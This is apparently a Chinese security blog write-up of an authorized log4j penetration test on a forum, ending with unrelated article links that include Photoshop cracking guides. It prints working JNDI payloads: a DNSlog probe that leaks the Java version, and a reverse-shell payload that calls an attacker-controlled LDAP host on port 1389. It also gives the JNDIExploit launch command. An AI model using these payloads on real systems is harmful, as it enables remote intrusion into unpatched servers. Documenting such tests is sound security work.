一次简单的log4j漏洞测试
✎ 阅读须知
乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经允许,禁止转载!
本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
在去年log4j
漏洞刚爆发的时候,很多平台都存在漏洞,当时也在第一时间在有授权的情况下对某论坛进行了渗透测试,结果发现存在漏洞,报告之后,漏洞也被很快修复。
本次对该渗透过程进行一个简单的记录,整个过程非常的简单,因为漏洞刚出来,也没有什么waf
,所以很快就拿下了。
以下过程已进行脱敏,漏洞均已修复。
1. Dnslog漏洞探测
云端攻击机kali : 1x.xxx.xx2.9
目标机:http://xxx.cn/
中转文件:JNDIExploit-1.2-SNAPSHOT.jar
1.1 payload描述
在log4j
漏洞中,一般构造诸如:${jndi:ldap://6bbs.dnslog.cn/test}
之类的漏洞。
但是在很多时候,因为有//
的存在,可能会触发系统自动将其作为url
链接访问,导致误判,因此在这里可以使用新的payload
进行测试:
${jndi:ldap://${sys:java.version}.335h25.dnslog.cn}
在这里可以显示版本信息,如果能够显示,则证明一定存在漏洞。
1.2 测试
去dnslog
平台申请一个域名:
gx.dnslog.cn
直接构造:
${jndi:ldap://${sys:java.version}.gx.dnslog.cn}
然后在论坛的搜索框执行:
此时DNSLOG
平台有数据,证明存在漏洞:
既然存在漏洞,那就试试能否拿下RCE
。
2. log4j RCE
云端攻击机kali : 1x3.xxx.xx2.9
目标机:http://xxx.com/
中转文件:JNDIExploit-1.2-SNAPSHOT.jar
2.1 准备工作
直接在攻击机上开启JNDIExploit-1.2-SNAPSHOT.jar
命令如下:
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机ip地址
通过漏洞探寻得知测试派的搜索框存在log4j
漏洞,直接在这里构造exp
即可:
${jndi:ldap://攻击机ip:1389/Basic/ReverseShell/攻击机ip/7777}
其中,去请求攻击机的的1389
端口,并且将shell
反弹给攻击机的7777
端口。
在攻击机上另启一个命令行,监听7777
端口:
此时状态如下:
2.2 攻击测试
直接在输入框里面输入上面构造好的exp
:
直接回车,shell
就弹回来了:
判断当前是物理机还是Docker
:
cat /proc/1/cgroup
此时显示为物理机。
测试结束,开始写报告。
3. 漏洞修复
相关文章
- Jgit的使用笔记
- 利用Github Action实现Tornadofx/JavaFx打包
- 叹息!GitHub Trending 即将成为历史!
- 微软软了?开源社区讨论炸锅,GitHub CEO 亲自来答
- GitHub Trending 列表频现重复项,前后端都没去重?
- Photoshop Elements 2021版本软件安装教程(mac+windows全版本都有)
- (ps全版本)Photoshop 2020的安装与破解教程(mac+windows全版本都有)
- (ps全版本)Photoshop cc2018的安装与破解教程(mac+windows全版本,包括2023
- 环境搭建:Oracle GoldenGate 大数据迁移到 Redshift/Flat file/Flume/Kafka测试流程
- 每个开发人员都要掌握的:最小 Linux 基础课
- 来撸羊毛了!Windows 环境下 Hexo 博客搭建,并部署到 GitHub Pages
- 超实用!手把手入门 MongoDB:这些坑点请一定远离
- 【GitHub日报】22-10-09 zustand、neovim、webtorrent、express 等4款App今日上新
- 【GitHub日报】22-10-10 brew、minio、vite、seaweedfs、dbeaver 等8款App今日上新
- 【GitHub日报】22-10-11 cobra、grafana、vue、ToolJet、redwood 等13款App今日上新
- Photoshop 2018 下载及安装教程(mac+windows全版本都有,包括最新的2023)
- Photoshop 2017 下载及安装教程(mac+windows全版本都有,包括最新的2023)
- Photoshop 2020 下载及安装教程(mac+windows全版本都有,包括最新的2023)
- Photoshop 2023 资源免费下载(mac+windows全版本都有,包括最新的2023)
- 最新版本Photoshop CC2018软件安装教程(mac+windows全版本都有,包括2023